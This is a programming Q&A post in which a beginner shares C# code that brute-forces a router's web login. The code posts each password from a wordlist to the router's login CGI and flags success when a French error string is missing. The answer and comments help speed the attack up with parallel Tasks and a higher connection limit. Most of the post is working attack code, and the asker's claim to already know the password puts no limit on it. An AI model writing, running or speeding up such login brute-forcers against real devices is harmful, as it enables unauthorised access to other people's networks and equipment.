# My Task c# webrequest doesnt work perfectly

Tags: c#, .net

I am a beginner in programming c#, im trying to bruteforce my router login page (i already have the password , just doing it for fun).im trying to add multithreading . i use TASK but it doesnt give any improve to the perfomance
this is the original code it takes 30 second to check 500 password

```
        List<string> passwordlist = new List<string>(File.ReadAllLines("pwdlist.txt"));
        CancellationTokenSource tokenSource = new CancellationTokenSource();
        foreach (string pass in passwordlist)
        {
           Check(pass, tokenSource);

        }
```

and this is my second code when i add task
and the problem is its also take 34-36seconds .its suppost to boost the perfomance

```
        List<string> passwordlist = new List<string>(File.ReadAllLines("pwdlist.txt"));
        CancellationTokenSource tokenSource = new CancellationTokenSource();
        foreach (string pass in passwordlist)
        {
            Task tassk = new Task(()=> Check(pass, tokenSource)); tassk.Start();
        }
```

also this is my Check function

```
private static void Check(string password,CancellationTokenSource tokenSource)
    {
        

        if (!tokenSource.IsCancellationRequested)
        {

        string data = "user=admin&password="+ password +"&isSubmit=1&userlevel=15&refer=%2Findex.html&failrefer=%2Fadmin.html&pageSrc=";

        var request2 = (HttpWebRequest)WebRequest.Create("http://192.168.1.1/Wizard/ge_login.cgi");

        var postData = Encoding.ASCII.GetBytes(data);
        request2.Method = "POST";
        request2.ContentType = "application/x-www-form-urlencoded";
        request2.UserAgent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36";
        request2.ContentLength = data.Length;
           
            using (var stream = request2.GetRequestStream())
           {
               stream.Write(postData, 0, data.Length);
           }
            var response = (HttpWebResponse)request2.GetResponse();
            string html = new StreamReader(response.GetResponseStream()).ReadToEnd();

            if (html.Contains("Saisissez"))
        {
            
           // return true;
        }
        else
        {
                tokenSource.Cancel();
                
                Console.ForegroundColor = ConsoleColor.Green;
               Console.WriteLine("\n");
                Console.WriteLine("Found it : " + password);
                SaveFinalPassword(password);
               


             
        }
            
        }
       
    }
```

Comment: Where is your code to implement multi-threading?

Comment: well what im tryin to do is execute the function check Multi times on parallel

Answer (score 1):

Your function `Check` doesn't start do stuff. First of all you need to call start method - `tassk.Start()`. After this, modify your Task creation, it's needs to know, when to stop doing "calculations", for this modify code like this:

```
List<string> passwordlist = new List<string>(File.ReadAllLines("pwdlist.txt"));
CancellationTokenSource tokenSource = new CancellationTokenSource();
var token = tokenSource.Token;
foreach (string pass in passwordlist)
{
   Task tassk = new Task(()=> Check(pass, tokenSource), token);
   tassk.Start();
}
```

Comment: Im soo sorry i forgot to add it .i already did and still not working

Comment: @3IMAD So, there is another problem - connection limit. All your task work parallel, but still wait, when connection will be free. To increase it add this line `System.Net.ServicePointManager.DefaultConnectionLimit = 10;`

Comment: well its still doesnt give any performance . im using an old router do you think its set autotmaticlly on his limit ? /

Comment: @3IMAD Parallel code not all the time give you a better perfomance, it's depends on many things, more often on amount of tasks or time that tasks works. But, if there last version of your code, do you add cancelation token? Because if don't programm will running until all task done their work.